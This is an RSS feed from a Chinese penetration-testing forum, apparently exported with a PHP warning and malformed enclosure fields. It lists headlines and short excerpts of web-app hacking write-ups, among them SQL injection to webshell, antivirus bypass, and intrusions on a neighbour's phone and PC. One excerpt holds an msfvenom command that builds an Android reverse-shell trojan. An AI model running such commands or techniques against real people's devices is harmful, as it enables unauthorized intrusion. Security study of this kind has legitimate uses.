<br />
<b>Deprecated</b>:  mysql_escape_string(): This function is deprecated; use mysql_real_escape_string() instead. in <b>/www/wwwroot/www.cobjon.com/source/class/discuz/discuz_database.php</b> on line <b>177</b><br />
<?xml version="1.0" encoding="gbk"?>
<rss version="2.0">
  <channel>
    <title>中国网络渗透测试联盟 - web app渗透测试::『Web App penetration testing』</title>
    <link>https://www.cobjon.com/forum-72-1.html</link>
    <description>Latest 20 threads of web app渗透测试::『Web App penetration testing』</description>
    <copyright>Copyright(C) 中国网络渗透测试联盟</copyright>
    <generator>Discuz! Board by Comsenz Inc.</generator>
    <lastBuildDate>Sat, 16 May 2026 00:19:07 +0000</lastBuildDate>
    <ttl>60</ttl>
    <image>
      <url>https://www.cobjon.com/static/image/common/logo_88_31.gif</url>
      <title>中国网络渗透测试联盟</title>
      <link>https://www.cobjon.com/</link>
    </image>
    <item>
      <title>互联网公开漏洞整理202309-202406--转载</title>
      <link>https://www.cobjon.com/thread-1549-1-1.html</link>
      <description><![CDATA[互联网公开漏洞整理202309-202406
道一安全 2024-06-05 07:41 北京
以下文章来源于网络安全新视界 ，作者网络安全新视界

发文目的：Nday漏洞的利用是安全攻防占比较大的攻击方式，希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。

漏洞 ...]]></description>
      <category>web app渗透测试::『Web App penetration testing』</category>
      <author>admin</author>
      <pubDate>Wed, 05 Jun 2024 06:31:29 +0000</pubDate>
    </item>
    <item>
      <title>2024攻防演练漏洞大全以及修补方案-亚信安全发布</title>
      <link>https://www.cobjon.com/thread-1548-1-1.html</link>
      <description><![CDATA[[md]![](file:///C:/Users/PRETTY~1/AppData/Local/Temp/msohtmlclip1/01/clip_image002.jpg)

目录

概述................................................................................................................................................... ...]]></description>
      <category>web app渗透测试::『Web App penetration testing』</category>
      <author>admin</author>
      <pubDate>Mon, 03 Jun 2024 06:08:10 +0000</pubDate>
    </item>
    <item>
      <title>记一次某医院渗透（近源）</title>
      <link>https://www.cobjon.com/thread-1539-1-1.html</link>
      <description><![CDATA[声明：文中涉及到的技术和工具，仅供学习使用，禁止从事任何非法活动，如因此造成的直接或间接损失，均由使用者自行承担责任。 


]]></description>
      <category>web app渗透测试::『Web App penetration testing』</category>
      <author>admin</author>
<enclosure url="/forum/

 

" length="众亦信安 


" type="image/jpeg" />      <pubDate>Fri, 01 Mar 2024 12:15:03 +0000</pubDate>
    </item>
    <item>
      <title>干货 | JWT渗透姿势一篇通</title>
      <link>https://www.cobjon.com/thread-1537-1-1.html</link>
      <description><![CDATA[干货 | JWT渗透姿势一篇通


]]></description>
      <category>web app渗透测试::『Web App penetration testing』</category>
      <author>admin</author>
<enclosure url="/forum/文章前言


" length="由于微信公众号推送机制改变了，快来星标不再迷路，谢谢大家！




" type="image/jpeg" />      <pubDate>Fri, 01 Mar 2024 11:49:25 +0000</pubDate>
    </item>
    <item>
      <title>渗透实战 | 从外网直接打到内网全过程</title>
      <link>https://www.cobjon.com/thread-1536-1-1.html</link>
      <description><![CDATA[这次渗透是一个从0到1，从外网到拿下域控的实战过程，希望可以给大家一些思路


]]></description>
      <category>web app渗透测试::『Web App penetration testing』</category>
      <author>admin</author>
<enclosure url="/forum/正文


" length="&nbsp;


" type="image/jpeg" />      <pubDate>Fri, 01 Mar 2024 11:41:32 +0000</pubDate>
    </item>
    <item>
      <title>原创-web渗透测试实战大杂烩</title>
      <link>https://www.cobjon.com/thread-1529-1-1.html</link>
      <description><![CDATA[注:各位同仁，今天晚上主要防止被限号来凑个数字，这篇文章本来是给一个机构做科普的，所以写的有点怎么说，反正土司的人看了会骂哈哈，大家凑合的看，文中哪怕有那么一点半点东西，能给大家带来启发，那么我这个文章就没白发，所以大佬们轻点喷哈哈，嘴下留情哈哈。 ...]]></description>
      <category>web app渗透测试::『Web App penetration testing』</category>
      <author>admin</author>
      <pubDate>Tue, 28 Nov 2023 12:23:22 +0000</pubDate>
    </item>
    <item>
      <title>转载对小绵羊的轰炸APP逆向分析</title>
      <link>https://www.cobjon.com/thread-1517-1-1.html</link>
      <description><![CDATA[在网络上意外看到一款叫小绵羊的轰炸机APP，经过下载安装(这种未知风险的APP建议都在模拟器上去安装验证和分析功能，有安全风险问题模拟器删除即可)后确认，只要在APP界面的编辑框中输入手机号码，就可以进行对指定手机号码进行短信狂轰炸的效果的（已用自己测试号码 ...]]></description>
      <category>web app渗透测试::『Web App penetration testing』</category>
      <author>admin</author>
      <pubDate>Fri, 08 Jul 2022 13:25:07 +0000</pubDate>
    </item>
    <item>
      <title>原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞</title>
      <link>https://www.cobjon.com/thread-1516-1-1.html</link>
      <description><![CDATA[文档编号： &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 

]]></description>
      <category>web app渗透测试::『Web App penetration testing』</category>
      <author>admin</author>
<enclosure url="https://www.cobjon.com/data/attachment/forum/

" length="" type="image/jpeg" />      <pubDate>Wed, 08 Jun 2022 12:32:44 +0000</pubDate>
    </item>
    <item>
      <title>ecshop之从注入、xss再到getwebshell</title>
      <link>https://www.cobjon.com/thread-1491-1-1.html</link>
      <description><![CDATA[1、 发现注入漏洞
http://www.test.cn发现有ecshop2.7.x支付插件漏洞，手工测试几次都没成功（之前测试是成功的），利用k8工具爆出管理员如下：

利用k8工具自动分离账号和密码
经过各种扫描没扫描到网站后台，这时候想到利用ecshop xss漏洞获取目标网站 ...]]></description>
      <category>web app渗透测试::『Web App penetration testing』</category>
      <author>admin</author>
      <pubDate>Wed, 30 Mar 2022 18:03:40 +0000</pubDate>
    </item>
    <item>
      <title>白名单msbuild绕过360套装安全狗云锁提权</title>
      <link>https://www.cobjon.com/thread-1490-1-1.html</link>
      <description><![CDATA[0x00 前言 


]]></description>
      <category>web app渗透测试::『Web App penetration testing』</category>
      <author>admin</author>
<enclosure url="/forum/0x01 前期的信息 ..." length="" type="image/jpeg" />      <pubDate>Wed, 30 Mar 2022 18:01:12 +0000</pubDate>
    </item>
    <item>
      <title>实战从注入点到服务器权限</title>
      <link>https://www.cobjon.com/thread-1489-1-1.html</link>
      <description><![CDATA[sqlmap测试注入点为http://www.xxoo.cn/newsDetail.jsp?id=10&amp;nbsp;mssql dba权限，用最新版的sqlmap发现不能使用--os-shell执行命令，提示不支持，差点就放弃，后来经过多次测试，用一个旧版本可以成功执行，既然权限是system，那么问题就简单了，思路是找到 ...]]></description>
      <category>web app渗透测试::『Web App penetration testing』</category>
      <author>admin</author>
      <pubDate>Wed, 30 Mar 2022 17:58:46 +0000</pubDate>
    </item>
    <item>
      <title>Web安全之实战通过os命令注入漏洞getwebshell</title>
      <link>https://www.cobjon.com/thread-1486-1-1.html</link>
      <description><![CDATA[[md]**一、
** **寻找突破口**

**经过右键查看源代码发现系统的特征为：images/select_bg.png，去钟馗之眼搜索如图：**

!(data/attachment/forum/202203/31/013456oll79nxwhwxz9h2l.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 \&quot;image.png\&quot;)



 ...]]></description>
      <category>web app渗透测试::『Web App penetration testing』</category>
      <author>admin</author>
      <pubDate>Wed, 30 Mar 2022 17:39:59 +0000</pubDate>
    </item>
    <item>
      <title>原创逻辑漏洞测试之用两种方法在微信登陆openid验证情况下下成功刷票</title>
      <link>https://www.cobjon.com/thread-1441-1-1.html</link>
      <description><![CDATA[[md]**最近一直在学习逻辑漏洞，偶然看到我家小孩学校组织的投票活动，得知老师组织这次投票活动，我专门向老师申请做一次逻辑漏洞测试，老师说非常欢迎，老师说对我这个玩电脑的家长早有耳闻，于是便有了以下的过程。此测试过程必须1、微信登陆下投票 2、token验证jwt ...]]></description>
      <category>web app渗透测试::『Web App penetration testing』</category>
      <author>admin</author>
      <pubDate>Thu, 30 Dec 2021 05:52:01 +0000</pubDate>
    </item>
    <item>
      <title>svg标签打cookie</title>
      <link>https://www.cobjon.com/thread-1440-1-1.html</link>
      <description><![CDATA[]]></description>
      <category>web app渗透测试::『Web App penetration testing』</category>
      <author>admin</author>
      <pubDate>Wed, 06 Nov 2019 03:34:32 +0000</pubDate>
    </item>
    <item>
      <title>逻辑漏洞之绕过验证漏洞演示</title>
      <link>https://www.cobjon.com/thread-1439-1-1.html</link>
      <description><![CDATA[v\\:* {behavior:url(#default#VML);}
o\\:* {behavior:url(#default#VML);}
w\\:* {behavior:url(#default#VML);}
.shape {behavior:url(#default#VML);}


 
  Windows 用户
  Normal
  SYSTEM
  2
  1
  2018-11-18T12:57:00Z
  2018-11-1 ...]]></description>
      <category>web app渗透测试::『Web App penetration testing』</category>
      <author>admin</author>
      <pubDate>Sun, 18 Nov 2018 13:02:27 +0000</pubDate>
    </item>
    <item>
      <title>从getwebshell到绕过安全狗云锁提权再到利用matasploit进服务器</title>
      <link>https://www.cobjon.com/thread-1434-1-1.html</link>
      <description><![CDATA[一、 利用getwebshell篇

首先对目标站进行扫描，发现是asp的，直接扫出网站后台和默认数据库，下载解密登陆如图：


下面进后台发现有fckeditor，而且还是iis6.0的，可以考虑创建个asp目录来构造解析（fck编辑器路径被改成别 ...]]></description>
      <category>web app渗透测试::『Web App penetration testing』</category>
      <author>admin</author>
      <pubDate>Sat, 20 Oct 2018 12:31:43 +0000</pubDate>
    </item>
    <item>
      <title>metasploit+ettercap中间人攻击成功入侵邻居手机</title>
      <link>https://www.cobjon.com/thread-1433-1-1.html</link>
      <description><![CDATA[五、msf+ettercap入侵邻居安卓手机 


]]></description>
      <category>web app渗透测试::『Web App penetration testing』</category>
      <author>admin</author>
<enclosure url="/forum/先用kali生成一个安卓木马，如下命令： 


" length="Msfvenom&nbsp;-p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444&nbsp;-o ~/Desktop/ribenav.apk 


" type="image/jpeg" />      <pubDate>Sat, 20 Oct 2018 12:30:37 +0000</pubDate>
    </item>
    <item>
      <title>利用CVE-2014-6332 IE全版本漏洞入侵邻居XP电脑</title>
      <link>https://www.cobjon.com/thread-1432-1-1.html</link>
      <description><![CDATA[一、利用 


]]></description>
      <category>web app渗透测试::『Web App penetration testing』</category>
      <author>admin</author>
<enclosure url="/forum/&nbsp;闲来无事，就想着写一篇内网渗透大杂烩的文章，之前用莲花仙子账号写的两篇内网渗透文章分别为渗透测试某大型局域网、渗透测试某大型局域网网关防火墙，现如今号都被删了，哎 ..." length="" type="image/jpeg" />      <pubDate>Sat, 20 Oct 2018 12:29:39 +0000</pubDate>
    </item>
    <item>
      <title>flash 0day之手工代码修改制作下载者实例入侵演示</title>
      <link>https://www.cobjon.com/thread-1431-1-1.html</link>
      <description><![CDATA[三、flash 0day之手工代码修改制作下载者实例入侵演示 


]]></description>
      <category>web app渗透测试::『Web App penetration testing』</category>
      <author>admin</author>
<enclosure url="/forum/Msf 


" length="Ettercap 


" type="image/jpeg" />      <pubDate>Sat, 20 Oct 2018 12:28:55 +0000</pubDate>
    </item>
    <item>
      <title>cve2015-5122漏洞实例演示虚拟机</title>
      <link>https://www.cobjon.com/thread-1430-1-1.html</link>
      <description><![CDATA[二、cve2015-5122漏洞实例演示虚拟机 


]]></description>
      <category>web app渗透测试::『Web App penetration testing』</category>
      <author>admin</author>
<enclosure url="/forum/search cve-2015-5122如图： ..." length="" type="image/jpeg" />      <pubDate>Sat, 20 Oct 2018 12:28:02 +0000</pubDate>
    </item>
  </channel>
</rss>